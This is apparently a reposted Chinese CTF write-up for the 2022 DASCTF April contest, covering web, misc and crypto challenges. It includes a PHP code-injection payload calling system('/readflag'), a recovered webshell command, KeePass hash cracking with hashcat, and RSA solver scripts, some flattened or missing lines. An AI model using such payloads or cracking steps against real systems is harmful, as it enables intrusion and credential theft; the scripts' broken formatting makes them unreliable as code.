本文来自“白帽子社区知识星球”
作者:WHT
WHT战队招新:
-
WHT战队欢迎对CTF有浓厚兴趣的师傅加入我们。
-
有半年以上CTF竞赛经验的。
-
包括但不限于Web、Misc、Reverse、Crypto、Pwn等各方向的CTFer加入。
-
加分项:有一年以上CTF竞赛经验的各方向CTFer。
有意向的师傅请扫描二维码联系我们
![2022DASCTF Apr X FATE 防疫挑战赛WP]( "2022DASCTF Apr X FATE 防疫挑战赛WP")
-
warmup_php
题目源码
//index.php
在ListView文件里有run方法的调用
而TestView继承自ListView
漏洞复现
GET参数:
action=TestView
POST参数:
properties[template]={TableBody}&properties[rowHtmlOptionsExpression]=var_dump(system('/readflag'));&properties[data][1]=123-
SimpleFlow
foremost 分离得到压缩包,有密码,在 tcp.stream eq 50 可发现进行了压缩处理
g479cf6f058cf8 传参是执行命令的地方,截断两位以后的字符进行base64解码cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E]
Yes,this is the flag file.And the flag is:DASCTF{f3f32f434eddbc6e6b5043373af95ae8}
-
熟悉的猫
KeePass Password Safe:https://keepass.info/news/n220109_2.50.html
len5,爆破,密码长度为五位keepass2john获取hash,crunch生成五位数字密码这里爆破五位密码,猜测不太可能范围比较广,考爆破一般都是考一些简单的弱口令,所以首先猜测一下是不是五位数字
root@kali /home/mochu7/Desktop % file len5.kdbxlen5.kdbx: Keepass password database 2.x KDBXroot@kali /home/mochu7/Desktop % keepass2john len5.kdbx > keepass.txtroot@kali /home/mochu7/Desktop % lskeepass.txt len5.kdbx password.txtroot@kali /home/mochu7/Desktop % vim keepass.txtroot@kali /home/mochu7/Desktop % lskeepass.txt len5.kdbx password.txtroot@kali /home/mochu7/Desktop % cat keepass.txt$keepass$*2*60000*0*202cd1ff66368c31010c30d785cf50b0bfcac3bec4fe987af9da5af836e9c38c*0e759e234e4a52cf5a1701cee13a1e531c399977c5f47e14821451eae209b393*c113ec1c681ac45ba118514db9c56824*c297910345ff2af4c1dca36d09d11b37831b49f91f50e57b7d530e0774614568*13db3f4b7a962fa9dae974f57678c3bca8a98e939d38b3aa3602e8aa61c96d34root@kali /home/mochu7/Desktop % crunch 5 5 0123456789 -o password.txtCrunch will now generate the following amount of data: 600000 bytes0 MB0 GB0 TB0 PBCrunch will now generate the following number of lines: 100000crunch: 100% completed generating outputroot@kali /home/mochu7/Desktop % ls -lhatotal 864Kdrwxr-xr-x 2 mochu7 mochu7 256K Apr 23 21:13 .drwxr-xr-x 22 mochu7 mochu7 4.0K Nov 1 22:36 ..-rw-r--r-- 1 mochu7 mochu7 50 Dec 25 2020 .directory-rw-r--r-- 1 root root 313 Apr 23 21:13 keepass.txt-rw------- 1 mochu7 mochu7 2.1K Apr 9 03:11 len5.kdbx-rw-r--r-- 1 root root 586K Apr 23 21:08 password.txt
hashcat爆破即可,这里爆破过了,所以直接出了root@kali /home/mochu7/Desktop % hashcat -m 13400 keepass.txt -a 0 password.txt --forcehashcat (v6.1.1) starting...You have enabled --force to bypass dangerous warnings and errors!This can hide serious problems and should only be done when debugging.Do not report hashcat issues encountered when using --force.OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]=============================================================================================================================* Device #1: pthread-Intel(R) Core(TM) i7-8750H CPU @ 2.20GHz, 2868/2932 MB (1024 MB allocatable), 4MCUMinimum password length supported by kernel: 0Maximum password length supported by kernel: 256INFO: All hashes found in potfile! Use --show to display them.Started: Sat Apr 23 21:15:58 2022Stopped: Sat Apr 23 21:15:58 2022root@kali /home/mochu7/Desktop % hashcat -m 13400 keepass.txt -a 0 password.txt --force --show$keepass$*2*60000*0*202cd1ff66368c31010c30d785cf50b0bfcac3bec4fe987af9da5af836e9c38c*0e759e234e4a52cf5a1701cee13a1e531c399977c5f47e14821451eae209b393*c113ec1c681ac45ba118514db9c56824*c297910345ff2af4c1dca36d09d11b37831b49f91f50e57b7d530e0774614568*13db3f4b7a962fa9dae974f57678c3bca8a98e939d38b3aa3602e8aa61c96d34:13152root@kali /home/mochu7/Desktop %
13152
zipzip的密码右键复制出来:jbRw5PB2kFmor6IeYYilhint.txt有零宽度字符隐写
塔珀自指公式(Tupper's self-referential formula)题目的应该很明显看得出来,网上找几个多试试即可,有些可能出来的结果不同import numpy as npimport matplotlib.pyplot as pltfrom PIL import Imagea=22b=160def Tupper_self_referential_formula(k):aa = np.zeros((a,b))def f(x, y):y += ka1 = 2**-(-a*x - y%a)a2 = (y // a) // a1return 1 if a2 % 2 > 0.5 else 0for y in range(a):for x in range(b):aa[y, x] = f(x, y)return aa[:,::-1]k=92898203278702907929705938676672021500394791427205757369123489204565300324859717082409892641951206664564991991489354661871425872649524078000948199832659815275909285198829276929014694628110159824930931595166203271443269827449505707655085842563682060910813942504507936625555735585913273575050118552353192682955310220323463465408645422334101446471078933149287336241772448338428740302833855616421538520769267636119285948674549756604384946996184385407505456168240123319785800909933214695711828013483981731933773017336944656397583872267126767778549745087854794302808950100966582558761224454242018467578959766617176016660101690140279961968740323327369347164623746391335756442566959352876706364265509834319910419399748338894746638758652286771979896573695823608678008814861640308571256880794312652055957150464513950305355055495262375870102898500643010471425931450046440860841589302890250456138060738689526283389256801969190204127358098408264204643882520969704221896973544620102494391269663693407573658064279947688509910028257209987991480259150865283245150325813888942058aa = Tupper_self_referential_formula(k)plt.figure(figsize=(15,10))plt.imshow(aa,origin='lower')plt.savefig("tupper.png")img = Image.open('flag.png')#翻转dst1 = img.transpose(Image.FLIP_LEFT_RIGHT).rotate(180)plt.imshow(dst1)plt.show()
PS水平翻转一下
33、121、141,结合题目名称以及flag.png的特征,猜测猫变换from PIL import Imageimg = Image.open('flag.png')if img.mode == "P": img = img.convert("RGB")assert img.size[0] == img.size[1]dim = width, height = img.sizest = 33a = 121b = 144for _ in range(st):with Image.new(img.mode, dim) as canvas:for nx in range(img.size[0]):for ny in range(img.size[0]): y = (ny - nx * a) % width x = (nx - y * b) % height canvas.putpixel((y, x), img.getpixel((ny, nx)))canvas.show()canvas.save('ok2.png')
DASCTF{751476c0-6cff-497f-9541-83ede0ebc5a0}
-
冰墩墩
16位,有些则没有16位,但是没有16位,但是没有16位的二进制最高位肯定是1,猜测不足十六位的需要补高。start.txt,猜测就是从这里开始
import refrom binascii import *tmp_filename = 'start.txt'bin_data = ''while True:try:file_path = './BinDunDun/' + tmp_filenamewith open(file_path) as f:content = f.read()next_file = re.findall(r'w{10}.txt', content)if next_file != []:tmp_filename = next_file[0]bin_data += content[:content.find(' ')].zfill(16)else:print(file_path)breakexcept:breakhex_data = ''with open('BinDunDun.zip', 'wb') as f1:for i in range(0, len(bin_data), 8):hex_data += '{:02x}'.format(int(bin_data[i:i+8], 2))f1.write(unhexlify(hex_data))
BinDunDun.pyc用pyc反编译看了下是画冰墩墩的Python代码,网上有,没有啥线索,尝试pyc隐写root@mochu7-pc:/mnt/d/Tools/Misc/stegosaurus# lsBinDunDun.pyc CONTRIBUTORS.md LICENSE README.md sample.py stegosaurus stegosaurus.py steg.pycroot@mochu7-pc:/mnt/d/Tools/Misc/stegosaurus# ./stegosaurus -x BinDunDun.pycExtracted payload: BingD@nD@n_in_BeiJing_Winter_Olympicsroot@mochu7-pc:/mnt/d/Tools/Misc/stegosaurus#
jpg各种隐写,最后发现是JPHS5
PS C:UsersAdministrator> php -r "var_dump(base64_decode('REFTQ1RGe0dvb2RfSm9kX0dpdmVfVGhlX0ZGRkZMQGdfVG9fWW91IX0='));"Command line code:1:string(41) "DASCTF{Good_Jod_Give_The_FFFFL@g_To_You!}"
Crypt
-
easy_real
# -*- encoding: utf-8 -*-'''@File : 1.py@Time : 2022/04/23 10:21:35@Author : David@Version : 1.0'''import randomimport hashlib, gmpy2from Crypto.Util.number import *p = 64310413306776406422334034047152581900365687374336418863191177338901198608319n = 4197356622576696564490569060686240088884187113566430134461945130770906825187894394672841467350797015940721560434743086405821584185286177962353341322088523c = 3298176862697175389935722420143867000970906723110625484802850810634814647827572034913391972640399446415991848730984820839735665233943600223288991148186397# for i in range(1,100):# if hashlib.md5(str(i)).hexdigest() == "37693cfc748049e45d87b8c7d8b9aacd":# e=i# breake = 23q = n / pd = gmpy2.invert(e, (p-1)*(q-1))m = pow(c, d, n)xored = (long_to_bytes(m))for i in range(1,10):print("".join(chr(ord(j)^i) for j in xored))
flag{W31coM3_C0m3_7o_f4T3ctf}
-
specialRSA
题目中e与phi互素且gcd(e,phi)=e,尝试AMM算法。共有26层,将每层解出来的m为下一层的c。每层的m可能会有多解,又因为每层的c小于当前的n。因此解出来的m小于下一层的n。可以做限定条件,最后每层至多得到两个m,分别尝试,最后跑通。
import randomdef AMM(o, r, q):g = GF(q)o = g(o)p = g(random.randint(1, q))while p ^ ((q - 1) // r) == 1:p = g(random.randint(1, q))t = 0s = q - 1while s % r == 0:t += 1s = s // rk = 1while (k * s + 1) % r != 0:k += 1alp = (k * s + 1) // ra = p ^ (r ** (t - 1) * s)b = o ^ (r * alp - 1)c = p ^ sh = 1for i in range(1, t):d = b ^ (r ^ (t - 1 - i))if d == 1:j = 0else:# print('[+] Calculating DLP...')j = - discrete_log(d, a)# print('[+] Finish DLP...')b = b * (c ^ r) ^ jh = h * c ^ jc = c ^ rresult = o ^ alp * hreturn resultdef findAllPRoot(p, e):proot = set()while len(proot) < e:p - 1), (p - 1) // e, p))return prootdef findAllSolutions(mp, proot, cp, p):all_mp = set()for root in proot:mp2 = mp * root % passert (pow(mp2, e, p) == cp)all_mp.add(mp2)return all_mpn = [1134876149917575363176366704410565158549594427794901202977560677131703617,68506321231437453734007374706367120760326482177047006099953454136095248103663,7783503593765446343363083302704731608384677185199537317445372251030064778965500447,1070135687488356161164202697449500843725645617129661751744246979913699130211505096520493,84012402115704505952834528733063574032699054524475028392540927197962976150657887637275643641,4497278582433699034700211877087309784829036823057043402314297478185216205338241432310114079123771,222438508972972285373674471797570608108219830357859030918870564627162064662598790037437036093579139489,19116847751264029874551971240684579996570601026679560309305369168779130317938356692609176166515369250878437,1549903986709797721131070830901667744892392382636347158789834851868638863292232718716074359148785900673192362699,62387766690725996279968636478698222263235233511074646032501495855928095611796694112573478405813305623307157261619643,1496134688150941811618178638810353297864345150241986530472328508974364124440160181353848429438725939837967063441528305921,128744123633657656499069966444992201456797762973822340505291131642660343436783413140023509983315177426811890315424928661125061,6917342652058596217869122177298094984415751234677039849514181349685079073411591975537016273056773954075238307918266361998553646469,1999306851167477770905800721615579416365273707414308684419794311809177595829473632853128686208533753019224536487399393397120864878000113,138594056023048386926766329537127538558164718841925506735112367176642328352257472034381662493666299220910783237918231719166519833124529218331,8397272388904583425531462714999219642572091279898695377838194583995214737828538895164195817973441184775814069396690436662985593377966417476040659,83372889332166088651413254885376085265561130214754686361784964744744711092668473281132249352040520639092871294276293287744276919265091479681667169671,10684953914628370830889219903654707140968094024767031366624595731918523435466123514094659595357231410471738736952266383928737163485550013190959149252435167,428359134899960532964729749713513106760306719712194950954567619156985067322564731294653991204666853689688900339268764469280769569535109069729404621290809120793,24491413133428851306933688733518898516890217803647806829002775935975741568422047344206442746983871735723486865901743352102305801200224958166496937663406627341150101,2247517335600310176909964109060502815240207684510918447209767597511414934626668616704865548059751008841620288545344598917362752622130186820039265603312354963258673860579,157978379942536176944325875241196121764116712487226808271002140500926678942090491383544034591205964958130852055691446362753906164711087278555153881606839791499207025307202087,43938571869497484913682975192955012614794498816057204091016374302341854100775132924321569876797699342959191646206571444845883942305710956894334106963321644724361549027630634869933,2609065298534470914730686454716224905333131812890643378630636043224255484662185236061585264231004975072801053316107165770342161619265243081616632312934742288262985830181883449780965531,222235907202454132555071455958700740228567465616560859711214102245461514428187391909176054661864893645713338391509536653547350134615807194339839952004333949540567943568810413945779642106201,44890472824427626252451120059527486677662371033945481542195354255473403815853320591468917295474578271680865394304946847791535710766947049195816261224382109115684638995528332538466194474846836399,1062789633774349417938788353001516763303743389381120380522262327123099728631034935663418832664265833959487018276693680850987382421521055508477988016246558095545925414048663082368488342633334571240563]tmp_n = n[::-1]#factordb 分解全部N得到pqpq = [[978009050697262759337388871320370165458800566798280419667959552859180906066907114053826258140106617,1086686910531802445146659484012613083647370307628438760118376029969836222533970554565751069314622539],[5952590790902091635268726673538951527433355660839816621733964706901441977862333411532558667717227,7541333580839789645678699855290145212677767915429008863004397257213367753100058966625356835737037],[14702310219802004876082313481498680940324963613770096574742182597840558294030859405666549879531,15115713372931874518523751684548940147062395364112500028355694776530968944848166318295947674571],[43870497594014737833600078975099212558645315030912084285417550950854483979406797450479252891,59471978701477648587546053450213894562580907285714122639903144859545186463681183925646967041],[206721456778089912780641186795393376537372828449722520397829606593267585681448641482345737,212549643149353357950643557614966235999942509894271006476145929120541407503538644651435909],[368461902207817023013078031477042541053987571003677386333567043030477451518424731838173,428750921047556327595864876619292414694543668237320723518704707914310601565770504401619],[1328165608715012145707239303399129070657427496129541416861187541092152796676371237057,1692196606246085729483398884059069884182535824953762329164855466589577530953493347747],[4479430800690915874719403516331677127806963529247809966024777708496270901092401687,5467527956822382309398095704409409074818664888285375307055715842283183939297839923],[15874438801602936764330936047390981280096007684699625987478211613419079727910193,26984206512970181742033712455904984758134288864531714209886622060356697128804201],[102366458668689911004027849640392002821642295855327735994412634235696717329671,104379442774418262390337411577160146519860415840398189010112686742489182665577],[262775599542220820608778738911414710660835549772895468394761119434220071003,317277895959173163347650321012213555955385929418622006880521870012130207557],[2623629589005115152329094552749299711026240699896424120660145647226563547,3200631836176555526009533059891690177091538103904679780020639896015937897],[11136261905010083405430254612464029672882837025885682392810368001188527,12445294229358634680867170058509842935273054334385354032543323581223253],[43449898447639409732732812916430042263570178747794530133229640125923,46014074200352892806829193743016415423205917845271691428043440245531],[66882708962198932251728043152245270662769508317424500666902658099,103424977238409568447978495499643051307907366367259219393937014631],[350121371461894793578110243222665782247737840410076591434903787,367712839396521757736384350030802803477965822058616833553305103],[954412804126450754097808991490470782833291028309980575506163,1567597041534155679238655992215022394597376421096298363211067],[6623023178993627032758350846838617937710601663528839184727,9419832152875820180139633405089278278408407453522978357309],[37185691759470013533730603170661686570987787098353146897,41680117092754807988080699273322244961911189757589699867],140758317578347635848563045232314610161039815135897421],576581905150085393327734090419529952232186498060949],2714357008989072105081411295741540337141142641741],10726403821316775206273675267109184566904426261],43974782968656404951924524450501283426052127],88380889077762105057154017276462714444697],295185057334340451492588650872876746227],1189933229053113361422958527792232151]]c = 1028324919038104683475485759234995158466543298184637219012354053883391759172761125802189697762778242175407876548832454351014064525118465877297277847501477586955680645311999174005606833294172830817159e = 113#暂存每轮得到的正确的mmmm = [34477005676820162206313524350718388995388964361111914461122792945404747258640626572519670215765749828347378102656628531443002193905830917576501911098980764185815997345702819264240009751148442426,122251474355770407049299923720807002619294038964768766444097932240736660221208587524190952184175408395327264273947998924572358674189845633957638043199338228060748873522292564061697159084155,2302982988306130873718678248046965635619977122378875400979845776887964102490919700970705411214473299613671701762260147495040038609477011076066320527267277326015932285789720472919789158,23537451475264654783397519677185909863292665248941544646127041892810699254693157668878272163047447965494360147684605330696871807540713768499564637999043110095219692999410680226995,140177373424899679430074829392928313477693819706173332758040927339401517742208025981523425936186925200196496612125625456430631622632150834127049737384042503028994857458226467,963130018196161068022561826136699615972631158326273266709450636152057794259408910239684181019014240059847446622341252471979045951190123708301480386597157821916163544334,22099780396461829722379389411334090279609060431701121609182515723815260652756755053990706324709932514832032225698612585831935469922880299786763383240418382919799321,105203615092085867196180713024031580953262645244470745062806287628728083957360817366488801411967688912343820375347382249694217193012009121220949533257603223298,2770807474173138559681583722575063626632396109101990628426422882126692567611876893424492013746533498499436328221834686503730687608977519563790607788117242,79522563507420097241671540749267415107213223614814036174487708662964551801437232540659877853816396875693921978483029788328787752167530021794795431857,2037298899016874045219277999643220063198097234557335235921481885211253636813115803603315238074035822211603707964528777576900935877949510316646223,91620534205913166538263094639686621545207290194630647497982781366417941090195313655420047805846906050555821244135842146392017800438719304994,634223615344447851225076194238185184332604736515528218505996221339671015125769748828654573318605955936504358040759056745442253727290998,1151747077760886031968395300122212971249677857649906015143598211944659498637807719069388997270109028927478629593266598515428543599,4885555691619901252961116690244561429850119193038756404218077274265730135140315447675335151534535632576283303735514949638673,441483827088168645513094641426499891374571558703981036806090540801685962515269086990244001450093104554187188047355883908,50746207344403804443969898876160025928774123141871973214027095925794652197169084777221214441362057146919986427284274,851834034713920072016294826766890940103178167607817794715692270318536007164857863881508649769981422663639184163,5772224180179962397158418478468305994920422145855450551932850591253169055736728137194928021864521464661511,201270414263671865648131358230135006175090857068415686069148837994386901812348962669414590276244279652,1631195497375922229848480131202350147418728908365651197102485655617240528564830722486663140830762,83436593835736927783034931301466249878138772728555530531816534785622373800125814331410735801,612402625116056383171913080691265536933185153779141510100715847406642891544437819056399,7523449601904104920623925101649366402016181450187359849499567637389273313904203215,23388304805925808822689623463866376122782272519632037291479310043364093060855]for i in range(len(n)):if i < len(mmm):c = mmm[i]":", c)continuef = 1if i + 1 == len(n):nnn = tmp_n[i]else:nnn = tmp_n[i + 1]p = pq[i][0]q = pq[i][1]cp = c % pcq = c % qmp = AMM(cp, e, p)mq = AMM(cq, e, q)p_proot = findAllPRoot(p, e)q_proot = findAllPRoot(q, e)mps = findAllSolutions(mp, p_proot, cp, p)mqs = findAllSolutions(mq, q_proot, cq, q)for mpp in mps:for mqq in mqs:solution = CRT_list([int(mpp), int(mqq)], [p, q])if i == 26:try:flag = bytes.fromhex(hex(solution)[2:])if b'DASCTF' in flag:print(flag)except:passif solution < nnn:# print(i, solution)if f:c = solutionf = 0#b'DASCTF{s4g3m4th_i5_co0l!}'
如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。
▼扫码关注白帽子社区公众号&加入知识星球▼
原文始发于微信公众号(白帽子社区):2022DASCTF Apr X FATE 防疫挑战赛WP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论